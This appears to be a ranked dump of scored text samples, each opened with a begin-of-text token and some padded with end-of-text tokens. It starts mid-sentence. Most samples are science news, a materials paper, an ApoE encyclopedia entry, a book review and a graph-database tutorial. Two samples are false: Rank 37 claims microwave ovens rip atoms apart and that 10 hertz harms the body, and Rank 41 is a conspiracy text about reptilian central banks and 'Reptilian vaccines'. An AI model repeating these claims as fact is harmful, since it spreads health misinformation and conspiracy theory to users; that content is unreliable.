supply circuit, and may also have a third pin for a safety connection to +================================================================================ +Rank = 31; Score = 1228800.0 +<|begin_of_text|>The SnO 2 /GS Foam was fabricated by a chemical self-assembly strategy and a subsequent freeze-drying process (Fig. 1). At step 1, from the collochemistry, the metal oxide such as Fe 2 O 3, TiO 2 and SnO 2 colloid was positively charged; the GO was negatively charged because GO has many oxygen containing functional groups on the surface35. The GO and SnO 2 nanoparticles were attracted by the electrostatic force so that the SnO 2 nanoparticles can distribute on the surface of GO and not departure by the ultrasonication and stir. At step 2, L-ascorbyl acid was used to reduce oxygen containing functional groups (e.g. carboxyl) on the surface GO, producing in situ reduced GO (rGO). rGO has smaller solubility in water than GO because the reduction of polar oxygen containing functional groups makes GO less hydrophilic. So, as GO sheet began to turn into the rGO, the delocalized π-bond’s conjugative effect would be increased and enlarged. The freshly formed rGO sheets would stack on other rGO sheets as a result of the π–π stacking interactions and self-assembled into a 3D structure. After the chemical reaction and at step 3, there are still many oxygen containing functional groups left on rGO sheets, thus, the SnO 2 nanoparticles with polar surfaces would interact with those functional groups via hydrogen bonding. By annealing at 550 °C, the hydrogen bonds may turn into oxygen bridges between SnO 2 and rGO, forming Sn-O-C bonds. Therefore, the SnO 2 nanoparticles are anchored strongly on the graphene surface through a C-O-Sn bridge, which facilitates the electron transfer and improve the electrode stability. Finally, we obtain a porous ASGF with relative density of ~19 mg cm−3. + +Figure 1: Schematic Illustration of Preparation of ASGF. Full size image + +The morphologies of the as-prepared ASGF were investigated by SEM and TEM. Typical SEM images in Fig. 2A,B show that ASGF possess a 3D structure with interconnected pores ranging from several nanometers to several micrometers. Moreover, the energy dispersive X-ray spectroscopy (EDX) measurement of the ASGF reveals that presence of Sn, O, and C. (Fig. 2E). The TEM images (Fig. 2C,D) show that the SnO +================================================================================ +Rank = 32; Score = 1228800.0 +<|begin_of_text|>ON A list of cutting-edge materials for high-tech applications, you might not expect to see wood near the top. But an experiment by Teng Li and Liangbing Hu of the University of Maryland may soon put it there. For Dr Li and Dr Hu, writing in Nano Letters, have just described how wood might be used to make one class of batteries cheaper by permitting the lithium now employed in them to be replaced with sodium. + +As any high-school chemist knows, lithium and sodium are chemically similar. Sodium ions (sodium atoms with an electron missing, which makes them positively charged) are, however, five times the size of lithium ions. That matters because a battery works by shuttling ions between its anode and its cathode. The bigger the ion, the more damage this shuttling causes—and the shorter, in consequence, is the battery’s life. Hitherto, that has ruled sodium out as a plausible ingredient of batteries. But engineers would still like to devise a commercially viable sodium battery, because sodium is much more abundant than lithium. + +Get our daily newsletter Upgrade your inbox and get our Daily Dispatch and Editor's Picks. + +Dr Li and Dr Hu wondered if the problem of electrode damage might be ameliorated by using a more pliant material for the frames on which the electrodes are suspended. These frames, which also transmit current to and from the electrodes, are normally made of metal, and are therefore rigid. But the two researchers reckoned that suitably treated wood could do the job of conduction equally well while providing more yielding support for an electrode that was continually expanding and contracting as ions moved in and out of it. + +To test this idea, they used slivers of wood from yellow pines. First, they coated these with carbon nanotubes, to improve their conductivity. Then they applied a film of tin to each sliver. (Tin is the preferred material for the anode in a lithium or sodium battery.) This done, they immersed the slivers in an electrolyte containing sodium ions and put the resulting battery through 400 cycles of discharging and recharging. As a control, they built similar batteries using slivers of copper. + +The wooden battery was not perfect. Its initial capacity was 339 milliamp hours per gram (mAH/g), but that fell to 145 mAH/g over the course of the 400 cycles. This, however, was not bad for a prototype, and far better than the copper-framed batteries managed. They had an initial capacity of +================================================================================ +Rank = 33; Score = 1220608.0 +<|begin_of_text|>Cryptography’s most familiar application is perhaps the sending of coded messages: Alice wants to communicate some information to her distant confidante Bob. She worries that her message might be intercepted by an eavesdropper, so she encrypts it in a way that only Bob can decipher. But there exists a whole range of complementary cryptographic tasks—such as online auctions and secure voting—in which Alice and Bob want to guard against attacks not from eavesdroppers but from each other. + +To develop algorithms to perform those other tasks, cryptographers use a building block called bit commitment: Alice chooses a bit (a 1 or 0) to be revealed later; Bob wants to ensure that Alice can’t change her mind in the meantime, while Alice wants to ensure that Bob has no way to learn which bit she chose until the appointed time. + +Although quantum theory is the basis for perfectly secure encryption, it offers no path to secure bit commitment. But a different law of physics, the impossibility of faster-than-light signaling, has now come to the rescue, and Anthony Martin, Hugo Zbinden, and their colleagues at the University of Geneva have implemented a protocol for achieving bit commitment for a full 24 hours. + +For the protocol to work, Alice and Bob work with trusted partners Amy and Brian, respectively. Bob and Brian take turns exchanging data with Alice and Amy, in such a way that each exchange falls outside the forward light cone of the previous one. Each of Alice’s and Amy’s answers depends on both the data they receive from Bob or Brian and on information Alice and Amy agree on in advance, including the bit they want to commit. For Alice to cheat and change the bit at any time in the middle of the protocol, she’d need to know what happened in Amy’s most recent exchange with Brian; relativity prevents her from having that information. + +In their 24-hour implementation, Martin and colleagues repeated the exchanges for 5 billion rounds, one every 17 µs, with a total of 162 GB of data. According to two theory papers from the past year, the probability that the protocol is vulnerable to cheating is less than one in a billion. (E. Verbanis et al., Phys. Rev. Lett. 117, 140506, 2016.)<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 34; Score = 1212416.0 +<|begin_of_text|>One of the greatest questions of our time is whether we are alone in the universe. And if there is some sort of extraterrestrial life out there, what are those aliens like? + +Neil deGrasse Tyson thinks we may have at least a glimpse within the coming decades, because we are likely to find out whether life has ever existed anywhere else in our solar system. + +Read: Here’s How Black Holes and Supernovas Kill You In Space + +In a recent “ask me anything” post on Reddit, the astrophysicist answered questions about aliens in our galactic neighborhood as well as in outer space in general. He said it’s entirely possible we will know “in the next couple of decades” whether Mars ever hosted life, and within the next century for the rest of the solar system as a whole, which includes moons in the outer reaches like Europa, Titan and Enceladus. + +But he has bad news for the people alive today who hope to have intelligent conversations with alien life forms that are more complex than a microorganism: Earth is probably not close enough to where those extraterrestrials live. + +“It’s all about our capacity to travel interstellar distances,” Tyson wrote. “And that’s surely not happening in the next 50 years. Not the rate things are going today.” + +Until technology advances, scientists are looking for life on other planets in the ways they know how. That includes searching for the things that sustain us on Earth, like water, oxygen and a temperature that is not too hot and not too cold. Although that seems like a biased approach, since other life forms could live under entirely different conditions, Tyson pointed out that the most crucial elements that sustain life on our planet — which include carbon, oxygen and hydrogen — are also among the most common elements in the universe. So maybe we are onto something after all. + +And if the idea of the universe’s vastness and all the potential aliens it holds makes you feel small, Tyson has a remedy for that. + +“Why not instead think of how awesome it is that our [3-pound] human brain matter actually figured all this out,” he said. “Why not look up to the clear night sky, and reflect on the fact that we don’t simply live in this universe, but the universe lives within us — through the atoms and molecules of our bodies, forged in the hearts of stars that long-ago gave their lives to the galaxy... and to us.” + +See also: + +The Signs of Life on Other Planets + +Supermassive +================================================================================ +Rank = 35; Score = 1179648.0 +<|begin_of_text|>The normally quiet neighborhood around the massive black hole at the center of our Milky Way Galaxy is being invaded by a gas cloud that is destined in just a few years to be ripped, shredded and largely eaten. + +Many, if not all, galaxies have massive black holes at their centers. But this supermassive black hole is the only one close enough for astronomers to study in detail, so the violent encounter is a unique chance to observe what until now has only been theorized: how a black hole gulps gas, dust and stars as it grows ever bigger. + +"When we look at the black holes in the centers of other galaxies, we see them get bright and then fade, but we never know what is actually happening," said Eliot Quataert, a theoretical astrophysicist and University of California, Berkeley professor of astronomy. "This is an unprecedented opportunity to obtain unique observations and insight into the processes that go on as gas falls into a black hole, heats up and emits light. It's a neat window onto a black hole that's actually capturing gas as it spirals in." + +"The next two years will be very interesting and should provide us with extremely valuable information on the behavior of matter around such massive objects, and its ultimate fate," said Reinhard Genzel, professor of physics at both UC Berkeley and the Max Planck Institute for Extraterrestrial Physics (MPE) in Garching, Germany. + +The discovery by Genzel; Stefan Gillessen of the MPE; Quataert and colleagues from Germany, Chile and Illinois will be reported online on Dec. 14, in advance of the Jan. 5 publication of the news in the British journal Nature. + +Since 2008. Genzel, Gillessen, Quataert and their team have seen the gas cloud about three times the mass of Earth speeding up as it has fallen deeper into the gravitational whirlpool of the black hole. Its edges are already beginning to fray. + +"It is not going to survive the experience," said first author Gillessen. He built the infrared detector on the European Southern Observatory's Very Large Telescope in Chile used to observe the movement of stars and gas in the center of the Milky Way, 27,000 light years from Earth. + +By 2013, scientists should see outbursts of X-rays and radio waves as the cloud -- composed mostly hydrogen and helium gas gets hotter and is torn asunder. The light emitted around the black hole could increase by a hundredfold to a thousandfold, Quataert calculated. + +The +================================================================================ +Rank = 36; Score = 1171456.0 +<|begin_of_text|>During the holiday season, many people place toy trains on circular tracks beneath their Christmas trees. + +This month, at the Princeton Plasma Physics Laboratory, physicists and engineers built tracks inside one of its fusion reactors and ran a toy train on them for three days. + +It was not an exercise in silliness, but in calibration. + +The modified model of a diesel train engine was carrying a small chunk of californium-252, a radioactive element that spews neutrons as it falls apart. + +Photo + +“We needed to refine the calibration technique to make sure we are measuring our neutrons as accurately as possible,” said Masa Ono, the project head of the National Spherical Torus Experiment. + +Advertisement Continue reading the main story + +The spherical torus experiment is a small reactor designed to test new approaches to fusion, in which hydrogen atoms are fused together at ultrahigh temperatures to produce energy — as the Sun does. Fusion generates copious numbers of neutrons, which tell how well the reaction is proceeding.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 37; Score = 1171456.0 +<|begin_of_text|>Microwave Facts + +Microwaves are radio waves with frequencies ranging from around 300 million cycles per second (300 MHz) to 3 GHz. RF. A standard measure of exposure for microwave energy is the Specific Absorption Rate (SAR) or rate of tissue energy absorption measured in watts per kilogram of tissue. + +Microwave radiation leakage can damage human cells and tissues. + +All appliances working on electricity produce a toxic electromagnetic field (EMF) of approximately 60 hertz. This is over and above potential microwave leakage from appliances or devices. + +Microwave ovens can leak + +Microwave leakage is serious enough that the FDA sets strict limits on it for the manufacturers. But once door seals age, leaking tends to exceed those limits, often at head level. That’s bad news, because the microwave energy inside a microwave oven is massive! + +Frequency inside your microwave 2.45 BILLION hertz. + +Frequency shown to start harming the human body: over 10 hertz + +That’s 2.45 billion vs. 10 hertz. It doesn’t take very big leak for the damage to begin. (One top culprit: aging door seals) + +The facts about microwaves & cataracts + +Eyes are especially vulnerable to microwaves. That’s because unlike other areas of the body, they lack the blood vessels to dissipate the heat and cellular stress. + +The first suspected clinical case of microwave-caused cataracts was reported by Hirsch and Parker as early as 1950's. (Sulman 1980). + +For decades, cataracts have been reported in workers exposed to this type of radiation. (On the back of the lens where radiation cataracts usually occur.) + +What do microwaves do to food? + +In a microwave oven, alternating current forces atoms reverse polarity at a startlingly high rate. This creates such violent friction that the water inside the food molecules begin to vibrate and heat up. + +The dangers of microwaved foods. + +Microwaves break chemical and molecular bonds, and can literally rip atoms apart, disrupting the basic biochemical structures of life. It’s no wonder foods cooked in such a way become so harmful to consume.Government and industry studies suggest they pose no threat, but a growing body of knowledge now contradicts those claims. + +Microwaved foods lose nutrition. + +The Swiss scientist Hans Hertel, was the first to study microwave dangers, specifically, how cooking degrades and depletes food of nutrients—an effect that shows up in study participants' blood samples. + + +================================================================================ +Rank = 38; Score = 1155072.0 +<|begin_of_text|>Apolipoprotein E (ApoE) is a class of proteins involved in the metabolism of fats in the body. It is important in Alzheimer's disease and cardiovascular disease.[5] + +Lipoproteins are molecules composed of fats and proteins. Apolipoprotein E is a fat-binding protein (apolipoprotein) that is part of the chylomicron and intermediate-density lipoprotein (IDLs). These are essential for the normal processing (catabolism) of triglyceride-rich lipoproteins.[6] In peripheral tissues, ApoE is primarily produced by the liver and macrophages, and mediates cholesterol metabolism. In the central nervous system, ApoE is mainly produced by astrocytes and transports cholesterol to neurons via ApoE receptors, which are members of the low density lipoprotein receptor gene family.[7] ApoE is the principal cholesterol carrier in the brain.[8] ApoE qualifies as a checkpoint inhibitor of the classical complement pathway by complex formation with activated C1q [9] + +Structure [ edit ] + +Gene [ edit ] + +The gene, APOE, is mapped to chromosome 19 in a cluster with apolipoprotein C1 (APOC-I) and the apolipoprotein C2. The APOE gene consists of four exons and three introns, totaling 3597 base pairs. APOE is transcriptionally activated by the liver X receptor (an important regulator of cholesterol, fatty acid, and glucose homeostasis) and peroxisome proliferator-activated receptor γ, nuclear receptors that form heterodimers with retinoid X receptors.[10] In melanocytic cells APOE gene expression may be regulated by MITF.[11] + +Protein [ edit ] + +APOE is 299 amino acids long and contains multiple amphipathic α-helices. According to crystallography studies, a hinge region connects the N- and C-terminal regions of the protein. The N-terminal region (residues 1–167) forms an anti-parallel four-helix bundle such that the non-polar sides face inside the protein. Meanwhile, the C-terminal domain (residues 206–299) contains three α-helices which form a large exposed hydrophobic surface and interact with those in the N-terminal helix bundle domain through hydrogen bonds and salt-bridges. The C-terminal region also contains a low density lipoprotein receptor (LDLR)-binding site.[12] + + +================================================================================ +Rank = 39; Score = 1146880.0 +<|begin_of_text|>Dezeen and MINI Frontiers: RCA graduate Julian Melchiorri says the synthetic biological leaf he developed, which absorbs water and carbon dioxide to produce oxygen just like a plant, could enable long-distance space travel. + +"Plants don't grow in zero gravity," explains Melchiorri. "NASA is researching different ways to produce oxygen for long-distance space journeys to let us live in space. This material could allow us t0 explore space much further than we can now." + +Melchiorri's Silk Leaf project, which he developed as part of the Royal College of Art's Innovation Design Engineering course in collaboration with Tufts University silk lab, consists of chloroplasts suspended in a matrix made out of silk protein. + +"The material is extracted directly from the fibres of silk," Melchiorri explains. "This material has an amazing property of stabilising molecules. I extracted chloroplasts from plant cells and placed them inside this silk protein. As an outcome I have the first photosynthetic material that is living and breathing as a leaf does." + +Related story "Growing a city from the bottom up" could save the human race + +Like the leaves of a plant, all Melchiorri's Silk Leaf needs to produce oxygen is light and a small amount of water. + +"Silk Leaf is the first man-made biological leaf," he claims. "It's very light, low energy-consuming, it's completely biological." + +"My idea was to use the efficiency of nature in a man-made environment," he explained. "I created some lighting out of this material, using the light to illuminate the house but at the same time to create oxygen for us." + +Subscribe to Dezeen's YouTube channel for the latest architecture and design movies + +However, Melchiorri says the material could also be used at a much larger scale. + +"It could [also] be used for outdoor applications," he says. "So facades, ventilation systems. You can absorb air from outside, pass it through these biological filters and then bring oxygenated air inside." + +Dezeen and MINI Frontiers is a year-long collaboration with MINI exploring how design and technology are coming together to shape the future. + +The music featured in the movie is a track called October by UK Producer Jo Noon. You can listen to the full track on Dezeen Music Project.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 40; Score = 1105920.0 +<|begin_of_text|>This is a ground-breaking philosophical exploration of consciousness and the self as they occur across the states of waking, falling asleep, dreaming, lucid dreaming, deep dreamless sleep, out-of-body experiences and dying. Evan Thompson's rich, beautifully written book interweaves lucid prose with relevant personal anecdotes, bringing the latest neuroscience together with ancient contemplative wisdom to offer valuable insight into the nature of consciousness and the self. The first-person methodologies of Indian and Asian contemplative traditions such as Yoga, Vedānta and Buddhism generate data that go beyond the reach of the standard scientific approach taken by Western neuroscience and psychology, for example on the possible presence of consciousness during deep dreamless sleep. At the same time, the Western scientific and philosophical approach serves to temper some of Indian metaphysical assertions, such as the claim that consciousness does not depend upon the brain. Thompson argues convincingly that the different approaches -- combined to form 'neurophenomenology' -- produce data that reinforce and complement each other, solidifying findings that, from just one perspective, would be more speculative (for example, that a minimal moment of reportable object-directed awareness is 10-20ms). One of main theses to emerge from the study is that the self is a fluid process, not a static thing, nor the illusion of a thing. Like clouds, the 'I-making' enacted self breaks up and re-forms with the different states of being, and like a sunlit sky, the luminous and pure background consciousness is able reveal the workings and contents of both, all the more so if cultivated as a meta-awareness through practices of meditation and mindfulness. + +An outstanding feature is the book's accessible presentation of up-to-date empirical data on both neuro-psychological research and its interface with studies on meditation. Thompson is unusually well-placed to write such a book. A meditation practitioner and lucid dreamer himself, he's also a renowned philosopher of mind who has for years been an active participant in dialogues among key players in the field, such as his well-known (now-deceased) mentor the cognitive neuroscientist Francisco Varela, the Dalai Lama and leading meditation neuroscientist Richard Davidson. His philosophical contributions to the field of cognitive science (including several previous books) enable him to synthesise the inter-disciplinary findings in a way that not only offers novel answers to existing questions but, like a tantalising Scrabble word, also opens up the field to provocative questions that invite new directions of critical engagement. + +In Chapter 1 +================================================================================ +Rank = 41; Score = 1073152.0 +<|begin_of_text|>The New World Disorder is a Reptilian Disorder designed to destroy what ENKI has created from the Appa Beast with the Divine Anunnaki Mothers and with the Clay of the Earth. + +The Reptiles call Humanity Beasts because you comprise of Carbon Atoms,6 Neutrons, 6 Electrons, 6 Protons, 666, the Atomic structure of the Beast, the Adamu,a Carbon Based Life Form. + +A Worker & Builder Group of the Creator. + +You are Marvalous Builders and Highly Creative. + +Humans are Carbon Based Lifeforms, while the Reptilians are Copper based. + +Sure Reptilians are stronger and live longer than Humans but they too are far from perfect, they have shortfalls, they lack Empathy, they lack compassion, they lack Passion, they lack Free will because they are slaves to their own hierarchy, they lack Love and are very heartless Beings and only know Domination and percieve Compassion as a Weakness and a Joke. + +They will never evolve to Higher Levels of Existence because they do not have what the Falcon Masters have, the Gift of the Akhu (The Divine Feather). + +Humanity on the other hand has been designed to be Unlimited in their Potential, Yes Unlimited, created by the Ultimate GENESIS Sciences of the Heavens. + +The Reptilian Vaccines will never alter the DNA of Adamu, the Reptilian Mind Control will never overcome DESTINY. + +Hear these words for these words are Eternal, Eternal. + +The CENTRAL BANKING SYSTEM is a REPTILIAN SYSTEM, The Dredds ( Jamaica ) call it the Babylon System, Correct it is an Ancient System, a System not only being used here on Earth but on other Planets in other Star Systems. + +The CENTRAL BANKING SYSTEM is EXTRATERRESTRIAL and it is a PRIVATE ORGANIZATION that Holds Governments & Kings to Account. + +The CENTRAL BANKS fund Wars, they fund Heroes & Enemies alike, yes they Fund$$$ both sides. + +No Nation can go to WAR without Funding$$$ from these CENTRAL BANKS. + +Governments that over extend their Budgets because of reckless Spending $$$, can Increase TAXES from the Beast, but when they are Bankrupt they will go to the CENTRAL BANKS for LOANS and to SECURE these LOANS with the EXTRATERRESTRIALS they hold the Nations Sovereignty and the Lives of all Humans / Adamu as collateral which is Treason. + +Humans must hold their respective Governments to Account for +================================================================================ +Rank = 42; Score = 1032192.0 +<|begin_of_text|>An ancient lake whose shores vacillated between lush forests and dry savannahs shows how the changing climate may have shaped humanity's dawn in eastern Africa, according to new research. + +Scientists studying organic remains dating back 2 million years in Olduvai Gorge in Tanzania tracked how plant life adapted to the regional climate as it shifted from regular monsoons to scorching dry spells. The researchers published their findings last week in the Proceedings of the National Academy of Sciences. + +The gorge was home to some of humanity's earliest hominid ancestors, and the surrounding landscape provides some of the best glimpses of the conditions they lived in from fossil remains, tools, artifacts and plant residues. + +"It's an unusual and almost extreme situation," said Gail Ashley a co-author and a professor of earth and planetary sciences at Rutgers University. "[The Olduvai Gorge is] like a perfect environment because it was a closed basin and it filled up with sediment, and those sediments recorded everything around it, just like a book." + +It was in these sediments that Ashley and her collaborators found waxes from prehistoric plants and algae, collected in samples over a decade from Olduvai. The team examined residues from 2 million years ago spanning a 200,000-year time frame, around the dawn of Homo erectus. + +Clayton Magill, a geochemistry graduate student at Penn State University and a co-author, explained that by measuring isotopes in these waxes, the team painted a picture of what kinds of plants grew in the gorge and what environments they lived in. + +"With carbon, we can delineate between grasses and trees," Magill said, noting that different plants have different carbon signatures. Hydrogen isotopes, on the other hand, measure aridity. "Heavier [hydrogen] isotopes are associated with drier conditions," he said. Water with lighter hydrogen isotopes tends to evaporate faster, so plants end up accumulating heavier hydrogen when the ground dries up. + +How brain development connects with climate + +From these measurements, the researchers traced what kinds of plants grew in the gorge over time and compared them with how the climate changed, constructing a continuous record of plant and water fluctuations. "What we find is that the period between 2 million and 1.8 million years ago is associated with extreme environmental variability," Magill said. + +Grasslands gave way to woody forests and back again while water levels in the gorge rose and fell, often very quickly by geological time scales. "There was evidence +================================================================================ +Rank = 43; Score = 1028096.0 +<|begin_of_text|>Image copyright ESA/Roscosmos/ExoMars/CaSSIS/UniBE + +Europe's and Russia's new satellite at Mars has sent back its first images of the planet. + +The Trace Gas Orbiter (TGO) arrived on 19 October, putting itself in a highly elliptical parking orbit. + +This must be circularised over the coming year before the mission can begin full science operations. + +But scientists have taken the opportunity of some close passes to the planet in recent days to check out the TGO's instrumentation. + +Image copyright ESA/Roscosmos/ExoMars/CaSSIS/UniBE Image caption A structure called Arsia Chasmata on the flanks of one of the large volcanoes, Arsia Mons. The width of the image is around 25 km + +There is delight at the quality of the pictures returned from camera system, CaSSIS (the Colour and Stereo Surface Imaging System). + +TGO passed over a region called Hebes Chasma at its closest approach, just 250km from the Martian terrain. + +"We saw Hebes Chasma at 2.8 metres per pixel," said Nicolas Thomas, the camera's principal investigator from the University of Bern, Switzerland. + +"That's a bit like flying over Bern at 15,000km/h and simultaneously getting sharp pictures of cars in Zurich." + +TGO sensors NOMAD and ACS also came through their early tests successfully. + +These are the sensors that will make a detailed inventory of Mars' atmospheric gases. + +In particular, they will go after the components that constitute less than 1% of the planet's air - chemical species such as methane, water vapour, nitrogen dioxide, and sulphur dioxide. + +Methane is the main focus. From previous measurements, its concentration is seen to be low and sporadic in nature. But the mere fact that it is detected at all is really fascinating. + +The simple organic molecule should be destroyed easily in the harsh Martian environment, so its persistence - and the occasional spikes in its signal - indicate a replenishing source of the gas. + +The speculation is that it could be coming from microbial life somewhere on the planet. + +It will be CaSSIS's job to look for possible geological forms on the surface that might tie into methane sources. A fourth instrument, FREND (successfully tested in recent days, too), will sense hydrogen in the near-surface. This data can be used as a proxy for the presence of water or hydrated minerals. + +This again is information that could yield answers to the methane question. + +T +================================================================================ +Rank = 44; Score = 1003520.0 +<|begin_of_text|>Hi everybody! + +After a long time gone I’m slowly getting back into business but with a lot of energy 🙂 + +Introduction + +These past weeks I’ve been solving a couple of coding challenges and for one of them I thought (and I still think) that the best solution would be achieved by using a Graph Db (can’t post details because of confidential reasons). I had a little bit of experience using Neo4j in the past, not an expert though. So I did a bit of research and I found Titan Db which caught my attention as they claim it is a scalable Distributed Graph Database supporting thousand of concurrent users executing complex graph traversals in real time, just what I needed. + +So this post will be about creating a small social network twitter-alike (following / followed by) using Titan Db. For those impatient creatures, here’s the code. + +Basic Example + +In this basic example we have the following relationships: + +Gabi is following Damian and John, and is followed by Damian and Mike. + +Damian is following Gabi and John, and is followed by Gabi. + +John is following Chris, and is followed by Gabi and Damian. + +Mike is following Gabi. + +Chris is followed by John. + +Pretty basic but enough to demonstrate how we can start creating these relationships in Titan Db using the Gremlin Scala DSL. + +Introduction to Graph Databases + +NOTE: If you’re already familiar with this concept feel free to skip this part. + +As described in the Apache TinkerPop website: “A graph is a structure composed of vertices and edges. Both vertices and edges can have an arbitrary number of key/value-pairs called properties. Vertices denote discrete objects such as a person, a place, or an event. Edges denote relationships between vertices. For instance, a person may know another person, have been involved in an event, and/or was recently at a particular place. Properties express non-relational information about the vertices and edges. Example properties include a vertex having a name, an age and an edge having a timestamp and/or a weight. Together, the aforementioned graph is known as a property graph and it is the foundational data structure of Apache TinkerPop”. + +So for our example every person will be a Vertex and both relationships “following” and “followedBy” will be Edges. Every person has an Id and a Name which will be Properties of each Vertice. + +Relationships in Scala + +The following code is part of our SocialNetworkService adding some explanation of what’s happening: + +private def findPerson(personId: Long): Option[ +================================================================================ +Rank = 45; Score = 995328.0 +<|begin_of_text|>Scientific confirmation that the NASA Mars rover Curiosity has found a location habitable to Martian microbial life 3 billion years ago is an historic milestone in planetary exploration. + +"This is an incredible adventure to get to this point so early in the mission, I feel giddy," said John Grunsfeld NASA associate administrator for science. + +The major finding was made in spite of a weak wisp of organics measured by the rover's instruments, except for a major spike in carbon dioxide from the material when heated to 1,535 deg. F (835 deg. C). + +The signatures of more than five hundred mass values were sampled during the heating of this drilled sample and analyzed by the SAM instrument. Five are shown in the graph. These traces are diagnostic 